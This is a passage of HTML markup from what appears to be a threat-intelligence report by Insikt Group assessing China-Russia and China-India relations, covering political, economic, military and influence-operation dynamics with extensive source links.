href="https://web.archive.org/web/20250910093650/https://www.thehindu.com/opinion/lead/indias-strategic-autonomy-in-a-multipolar-world/article70016666.ece">promote</a> and <a href="https://www.hudson.org/foreign-policy/indias-multi-alignment-rising-geopolitical-profile-aparna-pande">safeguard</a> India’s core national interests, including economic growth, national security, territorial integrity, regional stability, and global cooperation. 
Consistent with its strategic independence, New Delhi has <a href="https://www.isdp.eu/publication/india-in-a-world-of-asymmetrical-multipolarity/">cultivated</a> its role as a “neutral centrepiece” between China and the West while avoiding overt alignment with, or opposition to, any particular state.</p>
        <h3>Russia’s Foreign Policy</h3>
        <p>Moscow very likely views its relationships with China and India as beneficial to its core foreign policy goal of enhancing Russia’s global influence by replacing what Moscow sees as a US-centric global system with a multipolar world in which Russia is on equal footing with the US and China. This goal has almost certainly driven Moscow to place increased importance on relationships with non-Western powers, including China and India. Russia’s latest Foreign Policy Doctrine describes this goal as follows:</p>
        <p>Russia also sees value in expanding economic cooperation with China and India, as Moscow seeks to replace revenue lost due to Western sanctions. The sanctions that the EU and the US have placed on Russia for its annexation of Crimea in 2014 and full-scale invasion of Ukraine in 2022 have made Russia the most <a href="https://forbes.ge/en/the-most-sanctioned-countries/">sanctioned</a> state in the world.</p>
        <h3>China-Russia: Strategic Partners in Countering the West</h3>
        <p>In recent years, China and Russia have become critical strategic partners, with diplomatic, military, economic, and technological engagement deepening. Although tensions almost certainly exist, particularly between their respective intelligence services, close leader relations and convergence on strategic foreign policy objectives –– particularly pushing back against perceived Western hegemony –– mean these low-level tensions are unlikely to undermine China and Russia’s overall cooperative trajectory.</p>
        <h4>Political Dynamics</h4>
        <p>Chinese and Russian leadership almost certainly see each other as primary strategic partners in <a href="https://www.reuters.com/world/xi-putin-hold-phone-call-ukraine-war-anniversary-state-media-says-2025-02-24/">advancing</a> the “multipolar” world. In 2023, Xi <a href="https://www.aljazeera.com/news/2023/3/22/xi-tells-putin-of-changes-not-seen-for-100">said</a> to Putin, “We are the ones driving” changes unseen in a century, and multiple <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">joint</a> <a href="https://web.archive.org/web/20250829034246/http://en.kremlin.ru/supplement/6310">statements</a> have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the <a href="https://web.archive.org/web/20250908074225/https://tass.com/politics/2010229">Global Governance Initiative</a>, <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Security Initiative</a>, and <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Development Initiative</a>.</p>
        <p>Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have <a href="https://www.nytimes.com/2024/05/15/world/asia/putin-xi-china-summit.html#:~:text=Putin%20when%20he%20made%20Russia,more%20than%20any%20other%20leader.">met</a> over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia <a href="https://www.cfr.org/report/no-limits-china-russia-relationship-and-us-foreign-policy">declared</a> a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.</p>
        <p>Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> by roughly 10% since 2018. Although China’s position on the war in Ukraine is officially neutral (and in practice somewhat pro-Russia), the war very likely has had some negative effects on China, including potential trade <a href="https://www.kyivpost.com/post/60241">disruptions</a> and sanctions (<a href="https://www.eldwicklaw.com/uk-us-eu-sanctions-china/">1</a>, <a href="https://www.reuters.com/world/china/china-targets-two-eu-banks-retaliating-blocs-russia-sanctions-package-2025-08-13/">2</a>, <a href="https://edition.cnn.com/2024/10/18/china/us-sanctions-chinese-companies-attack-drones-russia-intl-hnk">3</a>). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, <a href="https://www.scmp.com/news/china/diplomacy/article/3316875/china-tells-eu-it-cannot-afford-russian-loss-ukraine-war-sources-say">prefers</a> a protracted conflict in Ukraine as it diverts the US’s focus away from China.</p>
        <p>At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document <a href="https://www.nytimes.com/2025/06/07/world/europe/china-russia-spies-documents-putin-war.html">prepared</a> by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/china-russia-yuan?lang=en">denominated</a> in Chinese yuan.</p>
        <p>China has purchased increasing quantities of Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, diminishing Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s imports of Russian oil and natural gas have substantially <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">increased</a>. On September 2, 2025, Russia and China <a href="https://interfax.com/newsroom/top-stories/113563/">signed</a> a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China <a href="https://www.bbc.com/news/60571253">buys</a> Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanction penalties, as seen in reportedly <a href="https://oilprice.com/Latest-Energy-News/World-News/Chinese-Oil-Buyers-Reduce-Russian-Purchases.html">cancelled</a> orders of Russian oil imports following US <a href="https://home.treasury.gov/news/press-releases/sb0290">sanctions</a> in late October 2025.</p>
        <p>In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/behind-the-scenes-chinas-increasing-role-in-russias-defense-industry?lang=en">dual-use</a> and <a href="https://www.politico.eu/article/china-firms-russia-body-armor-bullet-proof-drones-thermal-optics-army-equipment-shanghai-h-win/">military-relevant</a> <a href="https://www.rferl.org/a/russia-ukraine-china-sanctions-dual-use-yangjie-technology/33223415.html">goods</a> and <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">expertise</a>. As of mid-2025, dual-use exports to Russia likely have at least slightly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> from their peak in 2024.</p>
        <p>Overall trade between China and Russia has also <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">grown</a> significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">double</a> that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border <a href="https://web.archive.org/web/20250918185912/http://english.scio.gov.cn/m/internationalexchanges/2025-05/08/content_117863724.html">crossings</a> –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also <a href="https://www.aspistrategist.org.au/aspis-china-defence-universities-tracker-rising-china-russia-links-defence-industry-ties-dual-use-tech-research/">expanding</a>, and China and Russia have <a href="https://web.archive.org/web/20240517015745/https://tass.com/politics/1789195">announced</a> deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).</p>
        <p>There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing Russian imports, China very likely seeks to <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">avoid</a> overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began <a href="https://www.reuters.com/business/finance/russia-payment-hurdles-with-china-partners-intensified-august-sources-say-2024-08-30/">halting</a> transactions with Russian customers, and at least one bank did so as recently as September 2025 after being <a href="https://finance.yahoo.com/news/key-chinese-bank-reportedly-halts-092655214.html">sanctioned</a> by the EU. In September 2024, China <a href="https://web.archive.org/web/20250529101130/https://www.gov.cn/zhengce/content/202410/content_6981399.htm">implemented</a> a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.</p>
        <h4>Military Dynamics</h4>
        <p>Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more <a href="https://www.cfr.org/article/where-china-russia-partnership-headed-seven-charts-and-maps">frequent</a> and more <a href="https://www.iss.europa.eu/publications/briefs/rehearsing-war-china-and-russias-military-exercises">complex</a>, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to <a href="https://web.archive.org/web/20250911010902/https://www.nato.int/docu/review/articles/2018/12/20/vostok-2018-ten-years-of-russian-strategic-exercises-and-warfare-preparation/index.html">participate</a> in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise <a href="https://www.scmp.com/news/china/diplomacy/article/3192074/signs-china-russia-military-trust-vostok-2022-war-games">involved</a> a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber <a href="https://www.norad.mil/Newsroom/Press-Releases/Article/3849184/norad-detects-tracks-and-intercepts-russian-and-prc-aircraft-operating-in-the-a/">flight</a> into the US’s air defense identification zone (ADIZ) around Alaska for the first time. 
In September 2025, China and Russia <a href="https://jamestown.org/program/first-joint-russian-prc-submarine-exercise-patrols-pacific/">conducted</a> their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.</p>
        <p>In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he <a href="https://web.archive.org/web/20241031071355/https://www.rt.com/russia/605735-russia-china-military-cooperation/">stated</a> that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further <a href="https://web.archive.org/web/20241108084758/https://www.gov.cn/lianbo/bumen/202410/content_6980333.htm">indicates</a> that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”</p>
        <p>Beyond military exercises, US officials have <a href="https://www.politico.eu/article/united-states-accuse-china-help-russia-war-kurt-campbell/">asserted</a> as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government <a href="https://www.theguardian.com/world/2025/apr/18/ukraine-war-briefing-china-arming-russia-and-building-weapons-on-its-soil-says-zelenskyy">asserts</a> that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is <a href="https://archive.ph/Ewzr6">providing</a> Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US <a href="https://www.bbc.com/news/world-asia-china-64421915">sanctioned</a> a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">working</a> on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been <a href="https://www.cbsnews.com/news/eagle-s-how-yi-peng-3-and-newnew-polar-bear-wreaked-havoc-in-baltic-sea-60-minutes/">involved</a> in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.</p>
        <p>Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.</p>
        <h4>Cooperation in Propaganda and Influence Operations</h4>
        <p>We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, <a href="https://www.wilsoncenter.org/publication/china-russia-convergence-communication-sphere-exploring-growing-information-nexus">including</a> media forums, journalist exchange activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">stating</a> that they would “jointly articulate a common stance in the global media space.”</p>
        <p>China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) <a href="https://theintercept.com/2022/12/30/russia-china-news-media-agreement/">shows</a> that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage) <a href="https://www.recordedfuture.com/research/empire-dragon-accelerates-covert-information-operations-converges-russian-narratives">spread</a> narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely <a href="https://www.philstar.com/headlines/2025/08/25/2466374/copypasta-army-vietnam-smeared-bots-backing-duterte-x">used</a> a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.</p>
        <p>Since approximately 2019, China has <a href="https://demtech.oii.ox.ac.uk/wp-content/uploads/sites/12/2019/09/CyberTroop-Report19.pdf">increasingly</a> used computational propaganda and influence operation tactics likely <a href="https://www.washingtonpost.com/outlook/trump-wants-china-to-help-him-win-china-wants-nothing-to-do-with-him/2019/10/10/15fddd9a-eadf-11e9-9c6d-436a0df4f31d_story.html">learned</a> by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently <a href="https://journals.sagepub.com/doi/pdf/10.1177/17427665251328117?utm_source=chatgpt.com">frame</a> the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta <a href="https://www.theverge.com/2022/3/1/22956532/facebook-russian-state-media-global-recommendation-suspension">banned</a> Russian state media outlets from purchasing ads on its platforms, China Global TV Network <a href="https://www.axios.com/2022/03/09/chinas-state-media-meta-facebook-ads-russia?utm_source=chatgpt.com">placed</a> at least 21 pro-Russia advertisements on Facebook in a single month.</p>
        <h3>China-India: Nascent Thaw of Longtime Tension-Filled Relationship</h3>
        <p>China-India relations have <a href="https://strategicspace.nbr.org/cooperation-coexistence-and-contestation-in-indias-and-chinas-overlapping-strategic-spaces/">gone</a> through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.</p>
        <p>In recent months, China-India relations have likely <a href="https://web.archive.org/web/20250906232150/https://thediplomat.com/2025/09/china-india-transactional-thaw-or-structured-detente/">returned</a> to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely <a href="https://www.nytimes.com/2025/08/18/world/asia/india-china-trump.html">driven</a> India to pursue <a href="https://timesofindia.indiatimes.com/blogs/toi-edit-page/first-tango-in-five-years/">improved</a> ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” <a href="https://timesofindia.indiatimes.com/business/india-business/donald-trumps-tariffs-on-india-pm-modi-and-donald-trump-sco-meet-india-and-china-vladimir-putin/articleshow/123547432.cms">challenging</a> years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">noted</a> that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. 
Despite this nascent <a href="https://indianexpress.com/article/india/modis-china-visit-in-2-readouts-a-message-and-a-signal-strategic-autonomy-fair-trade-10222915/">rapprochement</a>, significant hurdles and unresolved disagreements <a href="https://web.archive.org/web/20250725103521/https://thediplomat.com/2025/07/the-limits-of-pragmatic-intentions-the-evolving-story-of-china-india-rapprochement/">remain</a>, making it less likely that China and India will form a long-term strategic partnership.</p>
        <h4>Political Dynamics</h4>
        <p>China’s approach to India is likely primarily <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">driven</a> by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">consolidate</a> control over disputed border territories, <a href="https://www.usip.org/publications/2023/05/why-we-should-all-worry-about-china-india-border-dispute">leading</a> to deadly skirmishes with India and <a href="https://www.recordedfuture.com/research/redecho-targeting-indian-power-sector">cyberattacks</a> <a href="https://www.recordedfuture.com/research/continued-targeting-of-indian-power-grid-assets">against</a> Indian critical infrastructure. India’s approach to China has likely been <a href="https://www.cfr.org/backgrounder/china-india-relationship-between-cooperation-and-competition">rooted</a> in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.</p>
        <p>Over the last year, China and India’s relations have <a href="https://www.reuters.com/world/china/ties-thaw-between-asian-rivals-india-china-2025-08-29/">thawed</a> significantly, especially compared to 2020, when the China-India border dispute <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">escalated</a>. In 2024, China and India <a href="https://www.cnn.com/2024/10/22/asia/india-china-border-agreement-intl-hnk">concluded</a> an agreement that <a href="https://www.reuters.com/world/asia-pacific/india-china-start-pulling-back-troops-border-face-off-points-source-says-2024-10-25/">returned</a> the border to its pre-2020 status, thereby completing a disengagement process and <a href="https://www.indiatoday.in/india/story/india-china-reopen-three-himalayan-trade-passes-after-five-years-2775110-2025-08-22">reopening</a> border trade. India and China began <a href="https://frontline.thehindu.com/world-affairs/india-china-relations-border-economic-trade/article69996270.ece">re-engaging</a> in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India <a href="https://www.lowyinstitute.org/the-interpreter/what-resuming-direct-india-china-flights-reveals-about-changing-regional-priorities">resumed</a> direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">emphasized</a> the importance of continued cooperation between the two countries.</p>
        <p>Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">endorsed</a> the idea of a multipolar world, but Modi has <a href="https://trackingpeoplesdaily.substack.com/p/analysis-of-the-modi-xi-meeting-in?utm_source=publication-search">emphasized</a> the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">seeks</a> to <a href="https://moderndiplomacy.eu/2025/09/13/india-and-china-as-beacons-of-multipolarity/">balance</a> asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only <a href="https://timesofindia.indiatimes.com/business/india-business/de-dollarisation-not-on-agenda-india-rebuffs-brics-currency-conspiracy-claims-exploring-cross-border-rupee-use/articleshow/122663479.cms">supported</a> inter-BRICS trade based on local currency.</p>
        <h4>Economic Dynamics</h4>
        <p>We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India <a href="https://web.archive.org/web/20211231125626/https://dpiit.gov.in/sites/default/files/pn3_2020.pdf">issued</a> Press Note 3, which <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">limited</a> new Chinese investment as well as existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared with the period before 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly <a href="https://archive.ph/uRVbz">rejected</a> a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.</p>
        <p>Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily <a href="https://www.indiatoday.in/business/story/make-in-india-made-in-china-manufacturing-economics-trade-deficit-report-pm-modi-geopolitical-2769387-2025-08-11">dependent</a> on Chinese supply chains, which very likely <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">gives</a> Beijing some economic leverage over India.</p>
        <p>India faces a significant and growing trade deficit with China — <a href="https://eoibeijing.gov.in/eoibejing_pages/MjQ,">reaching</a> $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">remains</a> India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.</p>
        <p>India has taken actions to <a href="https://timesofindia.indiatimes.com/business/india-business/how-india-is-planning-to-lower-reliance-on-china-for-its-supply-chains-new-plan-in-works/articleshow/104669779.cms">reduce</a> its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has <a href="https://www.pib.gov.in/PressReleasePage.aspx?PRID=2107825">bolstered</a> <a href="https://ibef.org/economy/make-in-india">investment</a> in domestic production and <a href="https://www.cato.org/policy-analysis/indias-new-protectionism-threatens-gains-economic-reform#introduction">implemented</a> protectionist policies, such as the “<a href="https://www.pmindia.gov.in/en/major_initiatives/make-in-india/">Make in India</a>” policy, the <a href="https://www.pib.gov.in/PressNoteDetails.aspx?id=155082&amp;NoteId=155082&amp;ModuleId=3">Production-Linked Incentive</a> (PLI) scheme, and, most recently, the “<a href="https://www.impriindia.com/insights/manufacturing-mission-2025/">National Manufacturing Mission</a>.” Threatening China’s economic and technological interests, India <a href="https://economictimes.indiatimes.com/tech/technology/non-chinese-lending-apps-including-payus-lazypay-kissht-blocked-on-meitys-order/articleshow/97656552.cms?from=mdr">banned</a> hundreds of Chinese-developed mobile applications and has <a href="https://www.hindustantimes.com/world-news/trust-replaces-icet-new-brand-old-spirit-on-tech-partnership-101739524899203.html">pursued</a> <a href="https://carnegieendowment.org/posts/2024/09/india-us-relations-beyond-the-modi-biden-dynamic?lang=en">efforts</a> with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. 
For example, China may have sought to <a href="https://restofworld.org/2025/china-foxconn-factoriesfoxconn-stops-sending-chinese-workers-to-india-iphone-factories/">impede</a> Apple from <a href="https://www.aljazeera.com/economy/2025/4/25/apple-to-move-assembly-of-us-phones-to-india-in-shift-away-from-china">moving</a> its supply chain for US phones from China to India.</p>
        <p>Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India <a href="https://www.orfonline.org/research/a-decade-of-neighbourhood-first-perspectives-from-south-asia">views</a> the region as its primary sphere of influence. The policy, <a href="https://www.tandfonline.com/doi/full/10.1080/09700161.2025.2545143?src=">considered</a> a “defining subset of its overall foreign policy,” <a href="https://www.mea.gov.in/lok-sabha.htm?dtl/38762/QUESTION+NO+262+INDIAS+NEIGHBOURHOOD+FIRST+POLICY">hinges</a> on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly <a href="https://economictimes.indiatimes.com/news/india/india-reiterates-opposition-to-chinas-belt-and-road-initiative-at-sco-conclave/articleshow/114282891.cms?from=mdr">opposes</a> China’s Belt and Road Initiative (BRI) because New Delhi <a href="https://www.cfr.org/backgrounder/chinas-massive-belt-and-road-initiative">views</a> China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and <a href="https://www.researchgate.net/publication/380693831_China's_Belt_and_Road_Initiative_A_Threat_to_Indian_Economy_and_Sovereignty">counter</a> India’s regional influence, posing a direct threat to Indian sovereignty. 
A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project <a href="https://finsindia.org/the-rise-of-china-as-a-threat-to-indias-national-security.html">linking</a> China and Pakistan through roads, railways, and pipelines — which India almost certainly <a href="https://web.archive.org/web/20250616104947/https://www.business-standard.com/external-affairs-defence-security/news/cpec-against-our-territorial-integrity-sovereignty-mea-on-pojk-124053001668_1.html">perceives</a> as the most immediate <a href="https://www.orfonline.org/research/indias-latest-concerns-with-the-cpec?">threat</a> to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to <a href="https://www.financialexpress.com/world-news/china-exits-pakistans-60-billion-cpec-flagship-project-islamabad-turns-to-adb-for-funding/3968043/">facilitate</a> Chinese energy imports while <a href="https://merics.org/en/analysis/bri-pakistan-chinas-flagship-economic-corridor">strengthening</a> Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major <a href="https://www.ndtv.com/india-news/high-degree-of-collusivity-indian-army-chief-general-upendra-dwivedi-on-pakistan-china-7879130?">concern</a> for India.</p>
        <p>Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion <a href="https://www.china-briefing.com/news/china-india-economic-ties-trade-investment-and-opportunities/">more</a> in 2021 than in 2018. The total value of foreign direct investment from China into India also <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">returned</a> to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China <a href="https://www.reuters.com/article/business/china-launches-new-aiib-development-bank-as-power-balance-shifts-idUSKCN0UU040/">launched</a> the AIIB in 2016, and the bank has dozens of <a href="https://www.aiib.org/en/projects/list/index.html">approved</a> projects in India.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.</p>
        <p>India and China <a href="https://www.bbc.co.uk/news/world-asia-53062484">share</a> a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic <a href="https://www.chathamhouse.org/2025/04/how-china-india-relations-will-shape-asia-and-global-order/evolution-border-dispute">dispute</a>. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry <a href="https://www.reuters.com/world/asia-pacific/what-was-india-china-military-clash-2020-about-2024-10-25/">devolved</a> into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">followed</a>, during which each side <a href="https://eastasiaforum.org/2024/11/29/china-india-pact-a-borderline-solution/">built</a> up troops in the contested areas. After at least 21 <a href="https://web.archive.org/web/20240221235015/https://mea.gov.in/press-releases.htm?dtl/37645/21st_round_of_IndiaChina_Corps_Commander_Level_Meeting">rounds</a> of Senior Highest Military Commander Level (Corps Commander) talks and other <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">efforts</a>, India and China <a href="https://www.mea.gov.in/rajya-sabha.htm?dtl/38689/QUESTION+NO+1199+RECENTLY+SIGNED+BORDER+AGREEMENTS+WITH+CHINA">signed</a> an agreement in 2024, which led to the <a 